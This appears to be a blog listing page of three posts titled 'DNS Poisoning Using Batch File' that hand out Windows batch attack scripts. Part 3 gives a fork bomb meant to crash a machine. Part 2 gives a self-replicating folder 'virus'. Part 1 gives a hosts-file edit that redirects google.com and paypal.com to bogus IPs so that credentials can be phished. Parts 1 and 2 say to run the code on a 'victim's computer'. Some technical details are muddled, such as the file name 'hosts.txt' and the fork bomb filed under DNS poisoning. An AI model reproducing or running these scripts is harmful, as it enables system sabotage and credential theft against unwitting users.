DNS POISONING USING BATCH FILE PART-3 No comments: DNS POISONING USING BATCH FILE PART-3Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.@echo off:loopExplorerCall fork.batGoto loopCopy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up. DNS POISONING USING BATCH FILE PART-3 Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork... View Post
DNS POISONING USING BATCH FILE PART-2 No comments: DNS POISONING USING BATCH FILE PART-2Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.Folder Replicator Virus:Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.1. Just open up a notepad, copy and paste the below codecd\cd C:\Documents and Settings\username\Desktop:loopmd Viruscd Virusgoto loop2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.3. Then run it on the Victims computer to infect it.4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code. DNS POISONING USING BATCH FILE PART-2 Batch program offers its programmers to create their custom viruses just by misusing the way the comma... View Post
DNS POISONING USING BATCH FILE PART-1 No comments: Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted scraps from your computer and even for creating a batch VIRUS.DNS Poisoning:The batch file can have the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steals credentials.1. Just open up a notepad, copy and paste the below code@echo offecho 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txtecho 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txtexit2. Save it as a batch file with the extension .bat3. Then run it on the Victims computer to infect it.4.This program creates a new entry in the hosts file, so that whenever a user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the PayPal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes. Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text edi... View Post